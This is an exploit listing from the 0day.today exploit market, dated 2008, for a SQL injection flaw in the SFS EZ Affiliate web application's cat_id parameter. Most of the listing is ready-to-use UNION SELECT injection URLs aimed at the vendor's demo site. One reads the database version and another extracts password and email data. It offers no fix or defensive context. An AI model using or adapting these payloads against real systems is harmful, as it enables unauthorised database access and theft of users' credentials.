[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SFS EZ Affiliate (cat_id) Remote SQL Injection Vulnerability

Author
d3b4g
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3993
Category
web applications
Date add
31-10-2008
Platform
unsorted
============================================================
SFS EZ Affiliate (cat_id) Remote SQL Injection Vulnerability
============================================================



----------------------------------------------------------------
Application : SFS EZ  Affiliate
Risk : High

----------------------------------------------------------------

Discovered by : d3b4g

----------------------------------------------------------------

Exploite:http://www.turnkeyzone.com/demos/affiliate/directory.php?ax=list&sub=3&cat_id=[sql]

Version Check:http://www.turnkeyzone.com/demos/affiliate/directory.php?ax=list&sub=3&cat_id=-1+union+all+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13+from+links/*

Demo: http://www.turnkeyzone.com/demos/affiliate/directory.php?ax=list&sub=3&cat_id=-1+union+all+select+1,2,concat_ws(password,email),4,5,6,7,8,9,10,11,12,13+from+links/*
----------------------------------------------------------------
          
-----------------------------------------------------------------
Proud to be a maldivian :))
=======================



#  0day.today [2024-11-15]  #